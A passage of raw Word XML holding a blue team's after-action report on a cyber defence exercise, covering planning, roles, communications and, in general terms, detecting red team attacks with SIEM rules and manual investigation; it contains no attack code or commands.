            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900537 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18AAFA4A" w14:textId="53638D1D" w:rsidR="005C5BE7" w:rsidRDefault="00C03E35" w:rsidP="005C5BE7">
      <w:pPr>
        <w:pStyle w:val="TableofcontentsHeading"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E26F6">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8C27F" w14:textId="77777777" w:rsidR="005C5BE7" w:rsidRDefault="005C5BE7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585FBAC" w14:textId="5899C2F9" w:rsidR="003E0724" w:rsidRPr="006E26F6" w:rsidRDefault="0037429C" w:rsidP="00E868F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc163900517"/>
      <w:r w:rsidRPr="006E26F6">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="66E86CE3" w14:textId="05E15FB6" w:rsidR="007763A7" w:rsidRPr="00CA5A49" w:rsidRDefault="008C0E01" w:rsidP="00CA5A49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose of the report is to describe team's observations and analysis of the exercise including planning and execution. </w:t>
      </w:r>
      <w:r w:rsidR="004269DA" w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, the report includes thorough documentation of two major incidents </w:t>
      </w:r>
      <w:r w:rsidR="007763A7" w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>analyzed during the incident as well as the</w:t>
      </w:r>
      <w:r w:rsidR="001448A0" w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> team’s</w:t>
      </w:r>
      <w:r w:rsidR="007763A7" w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> business model, risk management model, incident response plan and communications plan</w:t>
      </w:r>
      <w:r w:rsidR="004269DA" w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B46E39" w14:textId="422CE4CF" w:rsidR="008C0E01" w:rsidRPr="00CA5A49" w:rsidRDefault="00CC7DC0" w:rsidP="00CA5A49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The observations and analysis of the exercise are addressed in the second chapter. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The two major incidents are intro</w:t>
      </w:r>
      <w:r w:rsidR="00E54669" w:rsidRPr="00CA5A49">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>duced in the third. The business model, risk management model, incident response plan and communications plan are included as appendixes (A-D).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E3F1A" w14:textId="55647642" w:rsidR="002F20AC" w:rsidRDefault="00C83120" w:rsidP="00123E0F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc163900518"/>
      <w:r>
        <w:t>Obes</w:t>
      </w:r>
      <w:r w:rsidR="00D559EE">
        <w:t>ervastions and analysis of the exercise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="65A6BB5E" w14:textId="45E2D77F" w:rsidR="005C5BE7" w:rsidRPr="00CF248A" w:rsidRDefault="009045EF" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blue Team 2 agreed to have a weekly meeting every Thursday to prepare for the exercise. During the meeting, we agreed and distributed tasks. At the high level, we agreed responsible persons for every server / service</w:t>
      </w:r>
      <w:r w:rsidR="009207A2" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the environment. The persons</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> were responsible for familiarizing themselves with the server(s) / service(s) and to confirm that the monitoring capabilities are implemented as well as possible. Furthermore, we planned on how the team will operate during the exercise, who is responsible for what and who are the backups for each role. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB772E1" w14:textId="53CC7427" w:rsidR="005C5BE7" w:rsidRPr="00CF248A" w:rsidRDefault="009045EF" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, the planning corresponded quite well with the execution phase of the exercise. All necessary roles </w:t>
      </w:r>
      <w:r w:rsidR="005C5BE7" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fulfilled and </w:t>
      </w:r>
      <w:r w:rsidR="00946561" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tasks </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">distributed </w:t>
      </w:r>
      <w:r w:rsidR="00946561" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">quite </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">evenly. No </w:t>
      </w:r>
      <w:r w:rsidR="00695002" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>major</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gaps were identified. The lessons learned from the </w:t>
      </w:r>
      <w:r w:rsidR="00462A1E" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="0088297D" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00462A1E" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">run were taken into account in </w:t>
      </w:r>
      <w:r w:rsidR="00695002" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00462A1E" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> planning, and thus we were able to improve our operations for the </w:t>
      </w:r>
      <w:r w:rsidR="0088297D" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main run</w:t>
      </w:r>
      <w:r w:rsidR="00462A1E" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051F0C5" w14:textId="3FA590F9" w:rsidR="004A08FF" w:rsidRPr="00CF248A" w:rsidRDefault="004A08FF" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">During the exercise, we operated according to our pre-agreed roles. In general, we had a person responsible for </w:t>
      </w:r>
      <w:r w:rsidR="00DA3470" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">monitoring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">every server / service in the environment, a person responsible for logging, a team leader responsible for communications and overall coordination of activities. A substitute was agreed for each role. All identified anomalies and noteworthy events – both technical and social - were communicated via chat and logged to out-of-game template. In case an event required more investigation, the team organized around the case accordingly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C506E0" w14:textId="3D616351" w:rsidR="005C5BE7" w:rsidRPr="00CF248A" w:rsidRDefault="00966C21" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The internal communications were operated face-to-face and via White Team-created chat-channels. </w:t>
      </w:r>
      <w:r w:rsidR="00AD0442" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The process was quite efficient. Everyone was able to communicate the events found </w:t>
      </w:r>
      <w:r w:rsidR="00D9587E" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and our shared situational awareness was at a good level throughout the exercise. However, as there were various events identified and logged all the time, keeping up with everything happening during the exercise was quite challenging. </w:t>
      </w:r>
      <w:r w:rsidR="004F1578" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000128D6" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Although the situational awareness was at a good level, the EDR did not provide much additional value</w:t>
      </w:r>
      <w:r w:rsidR="00CD7ED2" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F11484" w14:textId="62E2EDAE" w:rsidR="00E02A90" w:rsidRPr="00CF248A" w:rsidRDefault="00E02A90" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The business and risk management model served as a good introduction for the exercise. Through creating both, we were able to pinpoint what is the purpose of our organization, what are our most important assets and risks associated to them. During the exercise itself, the models were not employed. However, we did see some of the biggest risks realizing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A32E6F" w14:textId="3209B0CD" w:rsidR="00CA5A49" w:rsidRDefault="21CA67D7" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Red teams successfully executed attack</w:t>
      </w:r>
      <w:r w:rsidR="078370D4" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with their offensive tooling. </w:t>
      </w:r>
      <w:r w:rsidR="005107D9" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> did not have proactive defense mechanisms which would prevent malicious code from running.</w:t>
      </w:r>
      <w:r w:rsidR="32699F37" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF0EE5" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Our</w:t>
      </w:r>
      <w:r w:rsidR="32699F37" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> defense simply relied on SIEM rules and manual investigation through SIEM or in server/workstation itself. </w:t>
      </w:r>
      <w:r w:rsidR="005203A0" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additional</w:t>
      </w:r>
      <w:r w:rsidR="2BB85BD7" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="32699F37" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indicators of red team atta</w:t>
      </w:r>
      <w:r w:rsidR="5A8CE8C6" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cks</w:t>
      </w:r>
      <w:r w:rsidR="005203A0" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> were also received</w:t>
      </w:r>
      <w:r w:rsidR="5A8CE8C6" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> through social media or MISP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA187C9" w14:textId="2C0B7F39" w:rsidR="005C5BE7" w:rsidRPr="00CF248A" w:rsidRDefault="00C04F7E" w:rsidP="00CF248A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="5A8CE8C6" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">successfully identified </w:t>
      </w:r>
      <w:r w:rsidR="5A8CE8C6" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">multiple red team attacks and </w:t>
      </w:r>
      <w:r w:rsidR="7E66A4D2" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remediated/mitigated</w:t>
      </w:r>
      <w:r w:rsidR="5A8CE8C6" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> actions that red team</w:t>
      </w:r>
      <w:r w:rsidR="51701CC5" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> executed.</w:t>
      </w:r>
      <w:r w:rsidR="696E2496" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C90196" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall performance for detecting and reporting incidents was good. Communication within the team was excellent. The team detected and reported most of the red team activities within the blue team information system. Communication with SOC provider and eHarbor CEO was conducted though VOIP and Rocketchat. </w:t>
      </w:r>
      <w:r w:rsidR="009959B4" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, t</w:t>
      </w:r>
      <w:r w:rsidR="461A1CEB" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he team</w:t>
      </w:r>
      <w:r w:rsidR="51701CC5" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF2E83" w:rsidRPr="00CF248A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>could have</w:t>
      </w:r>
